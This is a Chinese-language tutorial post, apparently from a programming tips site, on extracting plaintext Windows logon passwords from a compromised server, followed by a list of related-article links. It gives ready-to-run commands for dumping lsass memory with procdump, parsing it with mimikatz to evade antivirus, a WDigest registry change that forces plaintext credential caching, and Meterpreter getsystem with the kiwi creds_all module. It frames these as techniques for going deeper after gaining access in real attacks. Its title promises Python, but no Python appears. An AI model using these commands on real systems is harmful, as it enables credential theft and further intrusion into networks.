python簡單直接獲取windows明文密碼操作技巧

更新時間：2021年10月14日 16:21:46 作者：Bypass--

在實戰(zhàn)中，拿到一臺Windows服務器權(quán)限，如果可以直接獲取Windows明文密碼的話，就可以更容易深入挖掘。本文分享幾個獲取Windows明文密碼的技巧，簡單直接且有效

01、Procdump+Mimikatz

利用procdump+Mimikatz 繞過殺軟獲取Windows明文密碼。

（1）工具準備：

ProcDump：

https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

mimikatz：

https://github.com/gentilkiwi/mimikatz/

（2）Windows Server 2008 R2提取明文密碼

在目標機器上生成存儲文件：

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

將lsass.dmp復制到本地，使用mimikatz 一行命令將結(jié)果輸出到文本。

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit"> pssword.txt

如圖：成功從內(nèi)存中提取明文密碼。

02、Window 2012 R2抓取密碼

在Windows2012系統(tǒng)及以上的系統(tǒng)，默認在內(nèi)存緩存中禁止保存明文密碼的。攻擊者可以通過修改注冊表的方式抓取明文，需要用戶重新登錄后才能成功抓取。

（1）修改注冊表

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

（2）用戶administrator注銷后重新登錄，成功抓取到明文信息。

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" > pssword.txt

03、MSF kiwi模塊

使用kiwi模塊需要system權(quán)限，所以我們在使用該模塊之前需要將當前MSF中的shell提升為system。

提到system有兩個方法，一是當前的權(quán)限是administrator用戶，二是利用其它手段先提權(quán)到administrator用戶。然后administrator用戶可以直接getsystem到system權(quán)限。

meterpreter > getuid
Server username: BYPASS-E97BA3FC\Administrator
meterpreter > getsystem 
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

加載kiwi模塊：

load kiwi

列舉系統(tǒng)中的明文密碼：

creds_all

以上就是python簡單直接獲取windows明文密碼操作技巧的詳細內(nèi)容，更多關(guān)于python獲取windows明文密碼的資料請關(guān)注腳本之家其它相關(guān)文章！

您可能感興趣的文章:

相關(guān)文章

Python猜解網(wǎng)站數(shù)據(jù)庫管理員密碼的腳本
這篇文章主要和大家分享一個Python腳本，可以實現(xiàn)猜解網(wǎng)站數(shù)據(jù)庫管理員的密碼。文中的示例代碼講解詳細，需要的小伙伴可以參考一下
2022-02-02
解決python爬蟲中有中文的url問題
今天小編就為大家分享一篇解決python爬蟲中有中文的url問題，具有很好的參考價值，希望對大家有所幫助。一起跟隨小編過來看看吧
2018-05-05
Python人臉識別第三方庫face_recognition接口說明文檔
Python人臉識別第三方庫face_recognition接口簡單說明，及簡單使用方法
2019-05-05
Python使用ChainMap實現(xiàn)組合數(shù)據(jù)魔法實例探究
這篇文章主要為大家介紹了Python使用ChainMap實現(xiàn)組合數(shù)據(jù)魔法實例探究,有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進步,早日升職加薪
2024-01-01
Python實現(xiàn)對adb命令封裝
這篇文章主要介紹了Python實現(xiàn)對adb命令封裝，具有很好的參考價值，希望對大家有所幫助。一起跟隨小編過來看看吧
2020-03-03
圣誕節(jié)教你用Python繪制愛心圣誕樹
圣誕節(jié)快要到了，心血來潮，寫段代碼給大家介紹下基于Python繪制愛心圣誕樹的方法，代碼簡單易懂，對大家的學習或工作具有一定的參考借鑒價值，需要的朋友參考下吧
2021-12-12
Python?Fuzzywuzzy庫基本函數(shù)及模糊字符串匹配應用實戰(zhàn)
fuzzywuzzy?是一個用于模糊字符串匹配的?Python?庫,它基于編輯距離算法,提供了多個函數(shù)來比較字符串之間的相似性,在實際開發(fā)中,字符串匹配是一項常見但具有挑戰(zhàn)性的任務,用戶可能犯拼寫錯誤,使用縮寫或者輸入同義詞,因此,我們需要一種方法來處理這些情況
2023-12-12
Python文件時間操作步驟代碼詳解
這篇文章主要介紹了Python文件時間操作步驟代碼詳解,文中通過示例代碼介紹的非常詳細，對大家的學習或者工作具有一定的參考學習價值,需要的朋友可以參考下
2020-04-04
pygame學習筆記（6）：完成一個簡單的游戲
這篇文章主要介紹了pygame學習筆記（6）：完成一個簡單的游戲,本文綜合了學習過的知識,完成一個簡單的游戲開發(fā),是本系列文章的最后一篇,需要的朋友可以參考下
2015-04-04
python小練習題之條件語句if
這篇文章主要介紹了python小練習題之條件語句if的相關(guān)資料,文中介紹了年齡判斷、身高判斷、數(shù)字奇偶性判斷、閏年判斷、水仙花數(shù)判斷、成績等級判斷以及三角形判斷等常見場景,需要的朋友可以參考下
2024-12-12